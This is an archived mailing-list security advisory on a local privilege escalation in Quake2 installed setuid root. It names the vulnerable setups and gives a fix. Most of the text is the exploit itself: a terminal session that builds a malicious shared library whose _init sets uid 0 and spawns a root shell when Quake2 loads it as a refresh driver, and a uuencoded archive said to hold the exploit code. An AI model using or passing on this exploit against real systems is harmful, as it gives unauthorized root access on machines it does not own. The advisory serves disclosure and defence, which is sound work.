Vulnerable: Anyone who made Quake2 setuid root in order to use the svgalib software refresh. Solution: chmod u-s quake2, and use ref_softx instead of ref_soft. If you prefer console-based video, you could get GGI (http://synergy.caltech.edu/~ggi/), and use KGI with the SVGAlib wrapper (I haven't tried this). Exploit: Quake2 uses dlopen(3) to load its graphics code (which is in a seperate shared library). dlopen calls the _init function (if applicable) before it returns. Quake2 allows you to set which refresh driver to use on the command line, and loads the .so file from the working directory. The exploit is a shared library with one function; _init. It sets the uid and gid to 0, and spawns a shell. nop@chrome:~/ref_root> id uid=501(nop) gid=100(users) groups=100(users) nop@chrome:~/ref_root> make gcc -O2 -pipe -o ref_root.o -c ref_root.c -fPIC ld -m elf_i386 -shared -o ref_root.so -soname ref_root /usr/lib/crtbeginS.o ref_root.o /usr/lib/crtendS.o nop@chrome:~/ref_root> /usr/games/quake/quake2 +set vid_ref root couldn't exec default.cfg couldn't exec config.cfg Console initialized. ------- Loading ref_root.so ------- sh-2.00# sh-2.00# id uid=0(root) gid=0(root) groups=100(users) sh-2.00# exploit code follows. begin 644 ref_root.tgz M'XL(`/TBS#0``^W534_C,!`&X%[K7_$*+FW5$"<IH2V[7#BL5K`+$N*T0E7J M3!.+X)1\(!#BOZ_3!5K0"D[E2_-<8L],;"?1*+^B<YKIC%IKY$D9#@9HH2&? M7:T@#(%P$`;2V[$`3X8R:$&N\U`/ZK**"J!5Y'GU4MUK^4\JRK(Q"II-FN=# MIJ="/,S&$.U$*3A'/IRYGA.<_+%T*X>CEC-;-3O^N0\A[!+CU2JW+@O7!EU5 M5&3BDV>A*27:V*!H9S&<"U`VF^A@&,(ITZB@^,F>I=VTS$UT0<LC_V^QE_<7 M0KSW6_\XEE]P?7N\VO_;P7W_^](?2-O_GMS9YOY_"VYOV4J=R]K^#7S0]3S+ M==6%RN<WA4Y2FU)=>*/1$`=TI0U^4%XDA)XKQ*8V*JMCPK?:Z+**M]*]E9@- MV-YK8D*;"A-M=-7IXE9`V?9&KTS_^&>[0L`.Y!F^8\.=:N.6Z<;N(N8UL=^G MAX?-E*I:QQW9_3=.5L;TF*!K4E?462S7MROT%W?;S!TW/6.,,<888XPQQAAC 3C#'&&&.,,<:^IK\_JS?9`"@``%?4 ` end
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:41:02 PDT